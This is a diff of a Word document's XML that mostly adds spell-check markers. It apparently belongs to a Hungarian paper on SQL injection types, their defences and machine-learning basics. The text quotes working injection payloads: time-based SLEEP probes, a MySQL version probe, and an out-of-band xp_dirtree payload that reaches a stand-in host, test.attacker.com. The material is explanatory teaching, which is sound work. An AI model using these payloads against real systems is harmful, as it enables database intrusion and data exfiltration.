+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>error-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5470,19 +6009,31 @@
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>blind</w:t>
       </w:r>
-      <w:r>
-        <w:t>, inferential</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inferential</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5627,7 +6178,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (boolean-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>boolean-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5771,7 +6336,97 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+        <w:t xml:space="preserve"> SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>doby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6014,7 +6669,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(time-based) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>time-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6058,11 +6727,19 @@
         </w:rPr>
         <w:t xml:space="preserve">például </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ben a legkézenfekvőbb megoldást a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6086,6 +6763,7 @@
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6094,75 +6772,144 @@
         </w:rPr>
         <w:t>card</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-SLEEP(15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>card</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6181,7 +6928,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
+        <w:t xml:space="preserve">, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5.x verzióját futtatja.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6204,12 +6965,25 @@
         <w:t>out-of</w:t>
       </w:r>
       <w:r>
-        <w:t>-band)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6290,6 +7064,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6298,6 +7073,7 @@
         </w:rPr>
         <w:t>xp_dirtree</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6413,42 +7189,150 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
-      </w:r>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
-      </w:r>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '\\test.attacker.com\' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>product</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ’\\test.attacker.com\’ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6697,7 +7581,43 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
+        <w:t>Elkészített utasítások (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>prepared</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>statements</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6765,12 +7685,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>boolean-based</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6959,7 +7881,43 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
+        <w:t>Tárolt eljárások (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>stored</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>procedures</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7067,6 +8025,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> az </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -7075,6 +8034,7 @@
         </w:rPr>
         <w:t>sp_getAccountBalance</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7188,7 +8148,25 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
+        <w:t>Engedélyezőlista (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>allow-list</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) bemenetének ellenőrzése</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7306,7 +8284,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („bind variables”).</w:t>
+        <w:t xml:space="preserve"> („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>bind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”).</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7420,13 +8426,23 @@
         </w:rPr>
         <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">tableName </w:t>
+        <w:t>tableName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7821,12 +8837,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>supervised</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7851,12 +8869,14 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>unsupervised</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7875,12 +8895,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>reinforcement</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8205,7 +9227,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„train”</w:t>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8229,7 +9265,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>. A címkézett adatok (train)</w:t>
+        <w:t>. A címkézett adatok (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9116,7 +10166,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> osztályozás (classification) és</w:t>
+        <w:t xml:space="preserve"> osztályozás (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classification</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) és</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9128,7 +10192,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> regresszió (regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
+        <w:t xml:space="preserve"> regresszió (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9246,7 +10324,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (independent variables)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>independent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9288,7 +10394,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (dependent variable)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
